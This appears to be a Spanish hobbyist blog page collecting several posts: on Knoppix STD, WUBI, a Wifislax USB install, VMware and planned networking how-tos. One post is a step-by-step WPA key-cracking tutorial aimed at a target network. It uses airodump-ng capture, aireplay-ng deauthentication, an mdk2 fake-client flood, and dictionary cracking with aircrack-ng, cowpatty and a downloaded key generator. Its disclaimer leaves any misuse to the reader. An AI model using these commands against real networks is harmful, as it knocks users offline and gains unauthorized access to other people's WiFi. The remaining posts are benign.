Knoppix STD. Para hecharle un rato ^^.


Buenas a tod@s:


Llevo leyendo por los foros de elhacker y seguirdadwireless un par de dias y he sacado algunos temas muy interesantes ^^.

1. Knoppix STD: security tools distribution------->http://www.knoppix-std.org/index.html

Es una distribucion Knoppix (basada en una debian al igual que ubuntu), que implementa una suite de programas de seguridad en redes bastante potente. Sin embargo es una distro algo antigua (lleva el kernel 2.4.20 del 2001 sino me equivoco) y aunque trae utilidades wireless no implementa ningún driver de ninguna tarjeta y tampoco son soportadas :(. Ahora, sí por ciertas tarjetas de red, y para tanto, se puede actualizar los paquetes de la misma.

Sin embargo, no me he creido esa posibilidad(sin wireless? mmmm xDD) y he empezado a leer en los foros de esta distribución y efectivamente lo encontré------->http://forum.s-t-d.org/viewtopic.php?id=1463

Antes de nada, debeis registraros para poder leer el post, para registraros hacedlo aquí.

En ese post se cuenta basicamente que si quieres utilizar los drivers de tu tarjeta inalambrica (salvo que sea PCMCIA ó USB), tienes que cargalos o en el boot al inicio del live-cd o sí haces instalación de la distribución std, instalarlos a mano. El problema es que al ser un kernel tan antiguo, es posible (seguro ...) que tenga problemas de dependencias, es decir, entre otros paquetes que pudiese necesitar, está el ieee80211 qué me huelo que habría que actualizarlo. (publicaré como compilar tu propio driver para una distro).

De todas formas, lo interesante en esta distribucion es la cantidad de herramientas que porta para poder explotar cantidad de servicios, así que merece la pena dedicarle algo de tiempo, aunque sea a livearla.

Por último comentar que de cada uno de los herramientas, suelen tener en su carpeta correspondiente información sobre la utilización de la misma, documentación, uso ... ;).

Haber que os parece.

Apoyo a Shaak!!

Buenas a tod@s:

Llevo bastante tiempo sin hacer acto de presencia en el blog que creó Shak y nos parece QUE ESO NO PUEDE SER ASÍ (Verdad Shak ¿? :P). En serio, esto es el principio de un buen lugar donde poder disfrutar de la información libre que aporte cada uno.

Entonces, vamos a darle un Axuxón! a Shaktale por la contribución en temas de redes inalambricas y su rapido acercamiento a gnu-linux. Ahora se siente con muchas mas ganas de seguir aportando, así que:

VAMOS SHAK!!!!!

PD: Eh!!!, y animo al resto a aportar todo lo que vean conveniente ^^.

WUBI - Ubuntu más facil que nunca

EY! Navegando por ahí me he encontrado con WUBI y me he animado a instalar Ubuntu de nuevo.
Con WUBI, simplemente ejecutando el instalador desde win2, se nos descargará la última versión de Ubuntu y se instalará en nuestro HD, sin particionar ni lios por el estilo. También agregará el bootloader para elegir el SO de arranque.
Si queremos desinstalarlo, podemos hacerlo desde win2 como si fuera cualquier otra aplicación.

Muy útil para gente que, como yo, usamos win2 como SO principal. Podeis descargarlo en:

http://www.wubi-installer.org/

Obtener clave WPA

Vamos a ver si podemos explicar de forma rápida pero simple, la obtención de claves WPA.Tenemos que matizar 2 cosas:
- En primer lugar como siempre advertimos, este tutorial es para demostrar la inseguridad de las redes, LO KE CADA UNO HAGA CON EL ES COSA SUYA
- En segundo lugar la señal deberá llegarnos con intensidad REGULAR en adelante.

En primer lugar vamos a ver que necesitamos:

- Un ordenador con Wifislax (o cualquier distribucion de Linux, siemre que tengas aircrack-ng, cowpatty y fondecrypter).
- Fondecrypter ( http://www.megaupload.com/?d=8XM4I0S3)
- Diccionario (archivo de texto, con una relación de palabras en castellano, buscad cuesta la vida encontrarlo) y sino siempre puedes hacerlo tu con paciencia.
- Pen drive para almacenar Fondecrypter y nuestro diccionario de palabaras.


Damos por sentado que sabemos montar Wifislax y demas (quién no sepa, encontrará post en este mismo blog).

Bien pues manos a la obra...todo el mundo a cargar WIFISLAX o su distribucion de Linux (yo lo voy a explicar todo con WifiSlax)...ok, todo cargado no????
En este tema no vamos a picar un poco codigo para ir familiarizandonos con la Shell de Linux.

Antes de nada ya saben todo el mundo a cargar sus drivers: Wifislax->Asistencia chipset-> y pillamos nuestros drivers.

Pues nada chicos a picar código, abrimos la shell de linux, la podemos cargar desde el escritorio que tenemos un acceso rápido y escribiremos:
(todo va sin almohadillas)

#iwconfig

(así sabremos cual es nuestra interfaz: wifi0, rausb0, etc)

#airodump-ng wifi0

(lanzamos airudump el cual detectará todas las redes que tenemos a nuestro alcance y, en este caso wifi0 porque es mi interfaz, ya sabeis cada uno con su interfaz).
(debemos tener en cuenta que haya alguien conectado a la red a atacar, una vez que lo tengamos claro abriremos una nueva Shell, para el siguiente conmando).

#airodump-ng -c 9 --bssid MAC -w archivocaptura wifi0

-c 9: canal 9, nosotros en vez de 9 pondremos el canal donde este la red
--bssid: MAC de nuestra red
-w archivocaptura: especificamos el nombre donde guardaremos la captura.

(este comando por decirlo de forma rápida lo que hace es seleccionar la red en cuestión).Abrimos una nueva consola.

Bien hasta ahora espero que bien, recordar que si estais en la versión live tendreis que dejarle pensar un poco. Lo que nosotros estamos buscando es obtener el HANDSHAKE
En este punto del ataque tenemos 2 opciones para atacar:
-------------------------------------------------------------------------------------
# aireplay-ng -0 1 -a MAC -c CLIENTE wifi0

CLIENTE: cliente que está asociado a la red

(en este proceso lo que haremos es desautentificar al cliente de la red y cuando se vuelva a conectar lo cazamos, quizas haya que repetirlo varias veces).
-------------------------------------------------------------------------------------

# mdk2 wifi0 m -t 00:11:22:33:44:55

(en este caso lo que hacemos es generar 70 clientes ficticios al router, por lo que por esa saturación el cliente que estaba conectado se caerá y cuando vuelva a conectarse ZAS!!!!! pescamos el handshake).Podremos verlo en la primera Shell donde estaban todas las redes, justo debajo aparecerán los clientes ficticios.
-------------------------------------------------------------------------------------
Bien como saber si hemos obtenido el handshake.
En la segunda shell que hemos abierto, donde sellecionabamos la red en cuestión arriba a la derecha debería aparecer handshake 00:xx:xx.......
pues continuamos cuando lo tengamos aunque aki hay dos variantes
-------------------------------------------------------------------------------------
Una vez en este paso pincharemos nuestro Pen-Drive con el archivo de diccionario que habíamos conseguido anteriormente. Al hacer esto en el escritorio, nos saldrá la unidad de disco, pondremos el ratón encima y veremos que extensión es: hba1, hdc1, etc).
-------------------------------------------------------------------------------------
Ya estamos casi acabando...

# aircarck-ng -w /mnt/.... -b MAC archivocaptura-01.cap

-w /mnt...: especificamos la ruta de donde esta el diccionario

(saltará la ventana del aircrack y verás como empieza a comparar con las palabaras de tu diccionario).

SI TIENES SUERTE Y LA SACAS PUES MI MAS SINCERA ENHORABUENAAAAAAA, sino podemos intentar hacer algo más, me refiero a que si nuestro diccionario no funciona podremos intentar generar uno a partir del Handshake.
NO IMPORTANTE:
YO NUNCA LO HE CONSEGUIDO, PERO POR LA RED HE VISTO VIDEOS EN LOS QUE FUNCIONA!!!!!!!
-------------------------------------------------------------------------------------
Ahora copiaremos el archivo Fondecrypter en la carpeta home (en el escritorio encontrarás un acceso al sitio) REUCERDA KE DESDE TENER ABIERTO EL SITIO ORIGEN Y EL DESTINO PARA PEGARLOS

#chmod 777 fondecrypter
#./fondecrypter

(al hacer esto se crea un archivo de texto keysfon.txt en la carpeta home)

#genpmk –f keysfon.txt –d archivocaptura-01.cap –s nombredelared
-f: Diccionario.
-d: Nombre del fichero de hash que se generará.
-s: El Essid.

(yo en este paso, estuvo durante 7 horas y no encontró nada, pero si en vuestro caso lo encuentra solo os quedará hacer)

#cowpatty -r archivocaptura-01.cap –d keysfond.txt –s nombredelared
-r: Fichero *.cap donde capturamos el handshake con el airodump.
-d: Nombre del fichero generado con la utilidad genpmk.
-s: El Essid.

(y supuestamente debería darte la clave, pero ya te digo yo nunca lo he conseguido pero se que se puede).

En fin espero que os sirva todo y que os sirva todo, y si teneis alguna duda ya sabeis, en google esta la solución, aunque siempre podreis dejar un post akí y se intentará´ayudarte en lo que se pueda).

Saludoxxxxxxxx______Shak

WIFISLAX POCKET

Bien pues siguiendo en la misma línea, con WifiSlax 3.1, os presento la versión de bolsillo, la cual es mucho mas eficiente (en algunos aspectos) que la versión live en CD.

Para esto que necesitamos, pues evidentemente, un pendrive (a ser preferible de un 1Gb y formateado) y un disco con WifiSlax.

Pues bien iniciamos el proceso:


1.- En primer lugar, arrancaremos nuestro PC, con el disco live de wifislax. Nos logueamos y toda esa historia, tal y como explique en los manuales de wifislax.


2.- Una vez que ya tengamos cargado el entorno gráfico, pincharemos con el botón derecho, en el escritorio y seleccionaremos “Create New” à “Link Device” à “CD-ROM Device”.



3.- Una vez que se nos abre la ventana, nos vamos a la pestaña “Device” y en el menú desplegable que hay seleccionaremos /dev/hda.


4.- Bien si lo hacemos bien nos saldrá una ventanita de que todo se ha hecho bien y que pulsemos OK.

Bien si te das cuenta se e ha creado un icono en el escritorio, que pone CD-ROM


5.- Conectamos nuestro pendrive y copiamos el contenido del archivo creado en el PEN.


Por ahora solo quedará probarlo, o sea, reiniciar el pc, sacando el disco y conectando el usb. Pueden ocurrir dos cosas:

A.- Todo funciona de puta madre…. Pues nada adelante… ya podéis ir funcionando.

B.- Que os salgan los siguientes mensajes:

* changing root directory...
Fatal error occurred - Can't find executable chroot command
* Something went wrong and we can't continue. This should never happen.
* Please reboot your computer with Ctrl+Alt+Del

Pues no os preocupéis solo os quedará hacer una cosa mas. Descargaros este archivo h**p://telefonica.net/web2/wifislax/modulos-extra/ws31usb.zip y sobrescribirlo en la carpeta boot del PEN drive, volver a reiniciar el PC y supuestamente debería funcionar.

En fin espero que os guste esto y lo hagais la verdad que merece la pena y todo funciona mucho mas rápido que con el cd.

Saludoxxxxxx_______Shak
(por una red libre)

A lo que voy


Bueno, he estado trabajando en algunos temas relacionados con: sistemas unix (BASH); redes (usos de netcat y socat; utilización de puentes) y espero empezar a publicar:

1. How-To use Linux networking: Redes en linux; Implementación y diseño. Paquetes mas importantes y estructura de ellos. Uso de comandos típicos.

2. How-To use Bash Language:Uso de Bash. Estructuras típicas. Scripting con bash.

3. How-To live in Linux: Abrir la mente a nuevas formas de "acomodar" el dialogo con la maquina por cualquier shell. Uso de enlaces simbolicos, alias, y scripts.

4. How-To encript me: Uso de encriptación para la correspondencia electrónica. El uso el firma electrónica. Implementación en linux y en windows.

-Uso de ciertos programas que nos permiten conectarnos a nuestra máquina desde cualquier sitio. Ejemplos de uso de los comandos: netcat, socat, ssh.
-Seguridad en linux. Utilización de los permisos y modificación de los prinicpales ficheros.
-------------------
Windows:
1. How-To use Windows networking: uso de los comandos básicos de redes; netsh, net ...


Y de momento creo que eso es todo. Iré publicando conforme la vaya dando forma a cada tema. Quisiera ser extenso y explicarme bien e incluso darle un formato pdf. Ahora que caigo sería un buen momento para utilizar LaTeX (y hacer un mini how-to ^^).

Y por otro lado tendremos que empezar a tomar conciencia de mejorar la eficacia para rentabilizar bien la QoS. Nos interesa saber de redes y seguridad en redes para poder "medio-protegernos".


Nos vemos pronto (eso espero).

Makinas Virutales (kon WMWare)



Muy buenos dias:

Bien hoy vengo a presentaros una aplicacion bastatne interesante, VMWARE.

Pos esta joya que os presento, tiene la peculiaridad, de ser un programa (en principio, para windows), con el cual podrás emular cualquier sistema operativo.

Hemos de advertir lo siguiente, si quieres emular cualquier distribucion de Linux, no habrá ningún problema, ya que se considera Software Libre, pero si intentais emular cualquier Windows debeis "poseer una licencia"..., recordar que todo esto es a titulo informativo, lo que cada cual haga, ya es cosa suya.

Pues visto lo visto haremos lo siguiente, en primer lugar, evidentemente, descargar el programa en cuestión, el propio fabricante no lo ofrece gratuitamente:

http://www.vmware.com/

En segundo lugar, tenemos que tener cualquier disco o una imagen, del Sistema Operativo, recordar que las distribuciones de Linux, son gratuitas y podreis bajarlas desde cualquier página, e incluso de cualquier programa P2P.

Ahora tenemos todo lo necesario para trabajar, en primer lugar, sobra decir, que debemos instalar el programa, y deberias preguntarte ¿para que sirve esto?.

Bien... pues este programa lo que hace es generarte un ordenador virtual dentro de tu ordenador (en definitiva, la propia capacidad de nuestros ordenadores virtuales, será algo menos que la de nuestro propio ordenador). Con esto no quiere decir que si tu instalar un S.O. ya no puedes instalar mas, podras poner todos cuantos quieras e incluso emularlos al mismo tiempo.

El funcionamiento del programa es muy intuitivo y la verdad que se va pillando al vuelo, las cosas básicas, vale??? (no os lo vamos a dar todo maskado, hay que currarselo un poco), aunque si teneis dudas podeis preguntar, intentaremos ayudaros en lo que buenamente podamos.

El único problema que le veo a esto, es el tema de configuracion y deteccion de drivers, pero bueno todo eso esta por la red y seguro que encontrareis una cantidad de información, tanta que os sorprenderá.

Así podreis probar los sistemas operativos, distribuciones de Linux y sin tener que hacer particiones, etc etc.



Saludoxxxxx______________Shak

Kolaborando con la Red de Redes

Twitter Facebook Favorites More